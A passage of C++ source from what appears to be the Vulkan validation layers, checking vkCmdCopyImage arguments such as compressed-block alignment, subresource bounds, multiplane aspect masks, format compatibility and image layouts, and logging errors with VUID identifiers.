log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block " "width (%d), or when added to srcOffset.x (%d) must equal the image subresource width (%d).", i, src_copy_extent.width, block_size.width, region.srcOffset.x, mip_extent.width); } // Extent height must be a multiple of block height, or extent+offset height must equal subresource height if ((SafeModulo(src_copy_extent.height, block_size.height) != 0) && (src_copy_extent.height + region.srcOffset.y != mip_extent.height)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01729" : "VUID-VkImageCopy-extent-00159"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] extent height (%d) must be a multiple of the compressed texture block " "height (%d), or when added to srcOffset.y (%d) must equal the image subresource height (%d).", i, src_copy_extent.height, block_size.height, region.srcOffset.y, mip_extent.height); } // Extent depth must be a multiple of block depth, or extent+offset depth must equal subresource depth uint32_t copy_depth = (slice_override ? depth_slices : src_copy_extent.depth); if ((SafeModulo(copy_depth, block_size.depth) != 0) && (copy_depth + region.srcOffset.z != mip_extent.depth)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01730" : "VUID-VkImageCopy-extent-00160"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block " "depth (%d), or when added to srcOffset.z (%d) must equal the image subresource depth (%d).", i, src_copy_extent.depth, block_size.depth, region.srcOffset.z, mip_extent.depth); } } // Compressed // Do all checks on dest image // if (dst_state->createInfo.imageType == VK_IMAGE_TYPE_1D) { if ((0 != region.dstOffset.y) || (1 != dst_copy_extent.height)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), "VUID-VkImageCopy-dstImage-00152", "vkCmdCopyImage(): pRegion[%d] dstOffset.y is %d and dst_copy_extent.height is %d. For 1D images " "these must be 0 and 1, respectively.", i, region.dstOffset.y, dst_copy_extent.height); } } // VUID-VkImageCopy-dstImage-01786 if ((dst_state->createInfo.imageType == VK_IMAGE_TYPE_1D) && ((0 != region.dstOffset.z) || (1 != dst_copy_extent.depth))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), "VUID-VkImageCopy-dstImage-01786", "vkCmdCopyImage(): pRegion[%d] dstOffset.z is %d and extent.depth is %d. For 1D images these must be 0 " "and 1, respectively.", i, region.dstOffset.z, dst_copy_extent.depth); } // VUID-VkImageCopy-dstImage-01788 if ((dst_state->createInfo.imageType == VK_IMAGE_TYPE_2D) && (0 != region.dstOffset.z)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), "VUID-VkImageCopy-dstImage-01788", "vkCmdCopyImage(): pRegion[%d] dstOffset.z is %d. For 2D images the z-offset must be 0.", i, region.dstOffset.z); } if (dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) { if ((0 != region.dstSubresource.baseArrayLayer) || (1 != region.dstSubresource.layerCount)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), "VUID-VkImageCopy-srcImage-00141", "vkCmdCopyImage(): pRegion[%d] dstSubresource.baseArrayLayer is %d and dstSubresource.layerCount " "is %d. For VK_IMAGE_TYPE_3D images these must be 0 and 1, respectively.", i, region.dstSubresource.baseArrayLayer, region.dstSubresource.layerCount); } } // VU01199 changed with mnt1 if (GetDeviceExtensions()->vk_khr_maintenance1) { if (dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) { if ((0 != region.dstSubresource.baseArrayLayer) || (1 != region.dstSubresource.layerCount)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), "VUID-VkImageCopy-srcImage-00141", "vkCmdCopyImage(): pRegion[%d] dstSubresource.baseArrayLayer is %d and dstSubresource.layerCount " "is %d. For VK_IMAGE_TYPE_3D images these must be 0 and 1, respectively.", i, region.dstSubresource.baseArrayLayer, region.dstSubresource.layerCount); } } } else { // Pre maint 1 if (src_state->createInfo.imageType == VK_IMAGE_TYPE_3D || dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) { if ((0 != region.dstSubresource.baseArrayLayer) || (1 != region.dstSubresource.layerCount)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), "VUID-VkImageCopy-srcImage-00141", "vkCmdCopyImage(): pRegion[%d] dstSubresource.baseArrayLayer is %d and " "dstSubresource.layerCount is %d. For copies with either source or dest of type " "VK_IMAGE_TYPE_3D, these must be 0 and 1, respectively.", i, region.dstSubresource.baseArrayLayer, region.dstSubresource.layerCount); } } } // Dest checks that apply only to compressed images (or to _422 images if ycbcr enabled) if (FormatIsCompressed(dst_state->createInfo.format) || (ext_ycbcr && FormatIsSinglePlane_422(dst_state->createInfo.format))) { const VkExtent3D block_size = FormatTexelBlockExtent(dst_state->createInfo.format); // image offsets must be multiples of block dimensions if ((SafeModulo(region.dstOffset.x, block_size.width) != 0) || (SafeModulo(region.dstOffset.y, block_size.height) != 0) || (SafeModulo(region.dstOffset.z, block_size.depth) != 0)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-dstImage-01731" : "VUID-VkImageCopy-dstOffset-00162"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] dstOffset (%d, %d) must be multiples of the compressed image's " "texel width & height (%d, %d).", i, region.dstOffset.x, region.dstOffset.y, block_size.width, block_size.height); } const VkExtent3D mip_extent = GetImageSubresourceExtent(dst_state, &(region.dstSubresource)); if ((SafeModulo(dst_copy_extent.width, block_size.width) != 0) && (dst_copy_extent.width + region.dstOffset.x != mip_extent.width)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-dstImage-01732" : "VUID-VkImageCopy-extent-00163"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] dst_copy_extent width (%d) must be a multiple of the compressed texture " "block width (%d), or when added to dstOffset.x (%d) must equal the image subresource width (%d).", i, dst_copy_extent.width, block_size.width, region.dstOffset.x, mip_extent.width); } // Extent height must be a multiple of block height, or dst_copy_extent+offset height must equal subresource height if ((SafeModulo(dst_copy_extent.height, block_size.height) != 0) && (dst_copy_extent.height + region.dstOffset.y != mip_extent.height)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-dstImage-01733" : "VUID-VkImageCopy-extent-00164"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] dst_copy_extent height (%d) must be a multiple of the compressed " "texture block height (%d), or when added to dstOffset.y (%d) must equal the image subresource " "height (%d).", i, dst_copy_extent.height, block_size.height, region.dstOffset.y, mip_extent.height); } // Extent depth must be a multiple of block depth, or dst_copy_extent+offset depth must equal subresource depth uint32_t copy_depth = (slice_override ? depth_slices : dst_copy_extent.depth); if ((SafeModulo(copy_depth, block_size.depth) != 0) && (copy_depth + region.dstOffset.z != mip_extent.depth)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-dstImage-01734" : "VUID-VkImageCopy-extent-00165"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(dst_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] dst_copy_extent width (%d) must be a multiple of the compressed texture " "block depth (%d), or when added to dstOffset.z (%d) must equal the image subresource depth (%d).", i, dst_copy_extent.depth, block_size.depth, region.dstOffset.z, mip_extent.depth); } } // Compressed } return skip; } // vkCmdCopyImage checks that only apply if the multiplane extension is enabled bool CoreChecks::CopyImageMultiplaneValidation(VkCommandBuffer command_buffer, const IMAGE_STATE *src_image_state, const IMAGE_STATE *dst_image_state, const VkImageCopy region) { bool skip = false; // Neither image is multiplane if ((!FormatIsMultiplane(src_image_state->createInfo.format)) && (!FormatIsMultiplane(dst_image_state->createInfo.format))) { // If neither image is multi-plane the aspectMask member of src and dst must match if (region.srcSubresource.aspectMask != region.dstSubresource.aspectMask) { std::stringstream ss; ss << "vkCmdCopyImage(): Copy between non-multiplane images with differing aspectMasks ( 0x" << std::hex << region.srcSubresource.aspectMask << " and 0x" << region.dstSubresource.aspectMask << " )"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01551", "%s.", ss.str().c_str()); } } else { // Source image multiplane checks uint32_t planes = FormatPlaneCount(src_image_state->createInfo.format); VkImageAspectFlags aspect = region.srcSubresource.aspectMask; if ((2 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR)) { std::stringstream ss; ss << "vkCmdCopyImage(): Source image aspect mask (0x" << std::hex << aspect << ") is invalid for 2-plane format"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01552", "%s.", ss.str().c_str()); } if ((3 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_2_BIT_KHR)) { std::stringstream ss; ss << "vkCmdCopyImage(): Source image aspect mask (0x" << std::hex << aspect << ") is invalid for 3-plane format"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01553", "%s.", ss.str().c_str()); } // Single-plane to multi-plane if ((!FormatIsMultiplane(src_image_state->createInfo.format)) && (FormatIsMultiplane(dst_image_state->createInfo.format)) && (VK_IMAGE_ASPECT_COLOR_BIT != aspect)) { std::stringstream ss; ss << "vkCmdCopyImage(): Source image aspect mask (0x" << std::hex << aspect << ") is not VK_IMAGE_ASPECT_COLOR_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstImage-01557", "%s.", ss.str().c_str()); } // Dest image multiplane checks planes = FormatPlaneCount(dst_image_state->createInfo.format); aspect = region.dstSubresource.aspectMask; if ((2 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR)) { std::stringstream ss; ss << "vkCmdCopyImage(): Dest image aspect mask (0x" << std::hex << aspect << ") is invalid for 2-plane format"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstImage-01554", "%s.", ss.str().c_str()); } if ((3 == planes) && (aspect != VK_IMAGE_ASPECT_PLANE_0_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_1_BIT_KHR) && (aspect != VK_IMAGE_ASPECT_PLANE_2_BIT_KHR)) { std::stringstream ss; ss << "vkCmdCopyImage(): Dest image aspect mask (0x" << std::hex << aspect << ") is invalid for 3-plane format"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstImage-01555", "%s.", ss.str().c_str()); } // Multi-plane to single-plane if ((FormatIsMultiplane(src_image_state->createInfo.format)) && (!FormatIsMultiplane(dst_image_state->createInfo.format)) && (VK_IMAGE_ASPECT_COLOR_BIT != aspect)) { std::stringstream ss; ss << "vkCmdCopyImage(): Dest image aspect mask (0x" << std::hex << aspect << ") is not VK_IMAGE_ASPECT_COLOR_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcImage-01556", "%s.", ss.str().c_str()); } } return skip; } bool CoreChecks::PreCallValidateCmdCopyImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); bool skip = false; skip = ValidateImageCopyData(regionCount, pRegions, src_image_state, dst_image_state); VkCommandBuffer command_buffer = cb_node->commandBuffer; for (uint32_t i = 0; i < regionCount; i++) { const VkImageCopy region = pRegions[i]; // For comp/uncomp copies, the copy extent for the dest image must be adjusted VkExtent3D src_copy_extent = region.extent; VkExtent3D dst_copy_extent = GetAdjustedDestImageExtent(src_image_state->createInfo.format, dst_image_state->createInfo.format, region.extent); bool slice_override = false; uint32_t depth_slices = 0; // Special case for copying between a 1D/2D array and a 3D image // TBD: This seems like the only way to reconcile 3 mutually-exclusive VU checks for 2D/3D copies. Heads up. if ((VK_IMAGE_TYPE_3D == src_image_state->createInfo.imageType) && (VK_IMAGE_TYPE_3D != dst_image_state->createInfo.imageType)) { depth_slices = region.dstSubresource.layerCount; // Slice count from 2D subresource slice_override = (depth_slices != 1); } else if ((VK_IMAGE_TYPE_3D == dst_image_state->createInfo.imageType) && (VK_IMAGE_TYPE_3D != src_image_state->createInfo.imageType)) { depth_slices = region.srcSubresource.layerCount; // Slice count from 2D subresource slice_override = (depth_slices != 1); } skip |= ValidateImageSubresourceLayers(cb_node, &region.srcSubresource, "vkCmdCopyImage", "srcSubresource", i); skip |= ValidateImageSubresourceLayers(cb_node, &region.dstSubresource, "vkCmdCopyImage", "dstSubresource", i); skip |= ValidateImageMipLevel(cb_node, src_image_state, region.srcSubresource.mipLevel, i, "vkCmdCopyImage", "srcSubresource", "VUID-vkCmdCopyImage-srcSubresource-01696"); skip |= ValidateImageMipLevel(cb_node, dst_image_state, region.dstSubresource.mipLevel, i, "vkCmdCopyImage", "dstSubresource", "VUID-vkCmdCopyImage-dstSubresource-01697"); skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, region.srcSubresource.baseArrayLayer, region.srcSubresource.layerCount, i, "vkCmdCopyImage", "srcSubresource", "VUID-vkCmdCopyImage-srcSubresource-01698"); skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, region.dstSubresource.baseArrayLayer, region.dstSubresource.layerCount, i, "vkCmdCopyImage", "dstSubresource", "VUID-vkCmdCopyImage-dstSubresource-01699"); if (GetDeviceExtensions()->vk_khr_maintenance1) { // No chance of mismatch if we're overriding depth slice count if (!slice_override) { // The number of depth slices in srcSubresource and dstSubresource must match // Depth comes from layerCount for 1D,2D resources, from extent.depth for 3D uint32_t src_slices = (VK_IMAGE_TYPE_3D == src_image_state->createInfo.imageType ? src_copy_extent.depth : region.srcSubresource.layerCount); uint32_t dst_slices = (VK_IMAGE_TYPE_3D == dst_image_state->createInfo.imageType ? dst_copy_extent.depth : region.dstSubresource.layerCount); if (src_slices != dst_slices) { std::stringstream ss; ss << "vkCmdCopyImage(): number of depth slices in source and destination subresources for pRegions[" << i << "] do not match"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-extent-00140", "%s.", ss.str().c_str()); } } } else { // For each region the layerCount member of srcSubresource and dstSubresource must match if (region.srcSubresource.layerCount != region.dstSubresource.layerCount) { std::stringstream ss; ss << "vkCmdCopyImage(): number of layers in source and destination subresources for pRegions[" << i << "] do not match"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-extent-00140", "%s.", ss.str().c_str()); } } // Do multiplane-specific checks, if extension enabled if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { skip |= CopyImageMultiplaneValidation(command_buffer, src_image_state, dst_image_state, region); } if (!GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { // not multi-plane, the aspectMask member of srcSubresource and dstSubresource must match if (region.srcSubresource.aspectMask != region.dstSubresource.aspectMask) { char const str[] = "vkCmdCopyImage(): Src and dest aspectMasks for each region must match"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-aspectMask-00137", "%s.", str); } } // For each region, the aspectMask member of srcSubresource must be present in the source image if (!VerifyAspectsPresent(region.srcSubresource.aspectMask, src_image_state->createInfo.format)) { std::stringstream ss; ss << "vkCmdCopyImage(): pRegion[" << i << "] srcSubresource.aspectMask cannot specify aspects not present in source image"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-aspectMask-00142", "%s.", ss.str().c_str()); } // For each region, the aspectMask member of dstSubresource must be present in the destination image if (!VerifyAspectsPresent(region.dstSubresource.aspectMask, dst_image_state->createInfo.format)) { std::stringstream ss; ss << "vkCmdCopyImage(): pRegion[" << i << "] dstSubresource.aspectMask cannot specify aspects not present in dest image"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-aspectMask-00143", "%s.", ss.str().c_str()); } // Check region extents for 1D-1D, 2D-2D, and 3D-3D copies if (src_image_state->createInfo.imageType == dst_image_state->createInfo.imageType) { // The source region specified by a given element of regions must be a region that is contained within srcImage VkExtent3D img_extent = GetImageSubresourceExtent(src_image_state, &(region.srcSubresource)); if (0 != ExceedsBounds(&region.srcOffset, &src_copy_extent, &img_extent)) { std::stringstream ss; ss << "vkCmdCopyImage(): Source pRegion[" << i << "] with mipLevel [ " << region.srcSubresource.mipLevel << " ], offset [ " << region.srcOffset.x << ", " << region.srcOffset.y << ", " << region.srcOffset.z << " ], extent [ " << src_copy_extent.width << ", " << src_copy_extent.height << ", " << src_copy_extent.depth << " ] exceeds the source image dimensions"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-pRegions-00122", "%s.", ss.str().c_str()); } // The destination region specified by a given element of regions must be a region that is contained within dst_image img_extent = GetImageSubresourceExtent(dst_image_state, &(region.dstSubresource)); if (0 != ExceedsBounds(&region.dstOffset, &dst_copy_extent, &img_extent)) { std::stringstream ss; ss << "vkCmdCopyImage(): Dest pRegion[" << i << "] with mipLevel [ " << region.dstSubresource.mipLevel << " ], offset [ " << region.dstOffset.x << ", " << region.dstOffset.y << ", " << region.dstOffset.z << " ], extent [ " << dst_copy_extent.width << ", " << dst_copy_extent.height << ", " << dst_copy_extent.depth << " ] exceeds the destination image dimensions"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-pRegions-00123", "%s.", ss.str().c_str()); } } // Each dimension offset + extent limits must fall with image subresource extent VkExtent3D subresource_extent = GetImageSubresourceExtent(src_image_state, &(region.srcSubresource)); if (slice_override) src_copy_extent.depth = depth_slices; uint32_t extent_check = ExceedsBounds(&(region.srcOffset), &src_copy_extent, &subresource_extent); if (extent_check & x_bit) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcOffset-00144", "vkCmdCopyImage(): Source image pRegion %1d x-dimension offset [%1d] + extent [%1d] exceeds subResource " "width [%1d].", i, region.srcOffset.x, src_copy_extent.width, subresource_extent.width); } if (extent_check & y_bit) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcOffset-00145", "vkCmdCopyImage(): Source image pRegion %1d y-dimension offset [%1d] + extent [%1d] exceeds subResource " "height [%1d].", i, region.srcOffset.y, src_copy_extent.height, subresource_extent.height); } if (extent_check & z_bit) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-srcOffset-00147", "vkCmdCopyImage(): Source image pRegion %1d z-dimension offset [%1d] + extent [%1d] exceeds subResource " "depth [%1d].", i, region.srcOffset.z, src_copy_extent.depth, subresource_extent.depth); } // Adjust dest extent if necessary subresource_extent = GetImageSubresourceExtent(dst_image_state, &(region.dstSubresource)); if (slice_override) dst_copy_extent.depth = depth_slices; extent_check = ExceedsBounds(&(region.dstOffset), &dst_copy_extent, &subresource_extent); if (extent_check & x_bit) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstOffset-00150", "vkCmdCopyImage(): Dest image pRegion %1d x-dimension offset [%1d] + extent [%1d] exceeds subResource " "width [%1d].", i, region.dstOffset.x, dst_copy_extent.width, subresource_extent.width); } if (extent_check & y_bit) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstOffset-00151", "vkCmdCopyImage(): Dest image pRegion %1d y-dimension offset [%1d] + extent [%1d] exceeds subResource " "height [%1d].", i, region.dstOffset.y, dst_copy_extent.height, subresource_extent.height); } if (extent_check & z_bit) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-VkImageCopy-dstOffset-00153", "vkCmdCopyImage(): Dest image pRegion %1d z-dimension offset [%1d] + extent [%1d] exceeds subResource " "depth [%1d].", i, region.dstOffset.z, dst_copy_extent.depth, subresource_extent.depth); } // The union of all source regions, and the union of all destination regions, specified by the elements of regions, // must not overlap in memory if (src_image_state->image == dst_image_state->image) { for (uint32_t j = 0; j < regionCount; j++) { if (RegionIntersects(&region, &pRegions[j], src_image_state->createInfo.imageType, FormatIsMultiplane(src_image_state->createInfo.format))) { std::stringstream ss; ss << "vkCmdCopyImage(): pRegions[" << i << "] src overlaps with pRegions[" << j << "]."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-pRegions-00124", "%s.", ss.str().c_str()); } } } } // The formats of src_image and dst_image must be compatible. Formats are considered compatible if their texel size in bytes // is the same between both formats. For example, VK_FORMAT_R8G8B8A8_UNORM is compatible with VK_FORMAT_R32_UINT because // because both texels are 4 bytes in size. Depth/stencil formats must match exactly. if (FormatIsDepthOrStencil(src_image_state->createInfo.format) || FormatIsDepthOrStencil(dst_image_state->createInfo.format)) { if (src_image_state->createInfo.format != dst_image_state->createInfo.format) { char const str[] = "vkCmdCopyImage called with unmatched source and dest image depth/stencil formats."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), kVUID_Core_DrawState_MismatchedImageFormat, str); } } else { if (!FormatSizesAreEqual(src_image_state->createInfo.format, dst_image_state->createInfo.format, regionCount, pRegions)) { char const str[] = "vkCmdCopyImage called with unmatched source and dest image format sizes."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-srcImage-00135", "%s.", str); } } // Source and dest image sample counts must match if (src_image_state->createInfo.samples != dst_image_state->createInfo.samples) { char const str[] = "vkCmdCopyImage() called on image pair with non-identical sample counts."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdCopyImage-srcImage-00136", "%s", str); } skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-srcImage-00127"); skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-dstImage-00132"); // Validate that SRC & DST images have correct usage flags set skip |= ValidateImageUsageFlags(src_image_state, VK_IMAGE_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdCopyImage-srcImage-00126", "vkCmdCopyImage()", "VK_IMAGE_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateImageUsageFlags(dst_image_state, VK_IMAGE_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdCopyImage-dstImage-00131", "vkCmdCopyImage()", "VK_IMAGE_USAGE_TRANSFER_DST_BIT"); if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) { skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_TRANSFER_SRC_BIT, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-srcImage-01995", "VUID-vkCmdCopyImage-srcImage-01995"); skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-dstImage-01996", "VUID-vkCmdCopyImage-dstImage-01996"); } skip |= ValidateCmdQueueFlags(cb_node, "vkCmdCopyImage()", VK_QUEUE_TRANSFER_BIT | VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT, "VUID-vkCmdCopyImage-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_COPYIMAGE, "vkCmdCopyImage()"); skip |= InsideRenderPass(cb_node, "vkCmdCopyImage()", "VUID-vkCmdCopyImage-renderpass"); bool hit_error = false; const char *invalid_src_layout_vuid = (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdCopyImage-srcImageLayout-01917" : "VUID-vkCmdCopyImage-srcImageLayout-00129"; const char *invalid_dst_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdCopyImage-dstImageLayout-01395" : "VUID-vkCmdCopyImage-dstImageLayout-00134"; for (uint32_t i = 0; i < regionCount; ++i) { skip |= VerifyImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdCopyImage()", invalid_src_layout_vuid, "VUID-vkCmdCopyImage-srcImageLayout-00128", &hit_error); skip |= VerifyImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdCopyImage()", invalid_dst_layout_vuid, "VUID-vkCmdCopyImage-dstImageLayout-00133", &hit_error); skip |= ValidateCopyImageTransferGranularityRequirements(cb_node, src_image_state, dst_image_state, &pRegions[i], i, "vkCmdCopyImage()"); } return skip; } void CoreChecks::PreCallRecordCmdCopyImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, 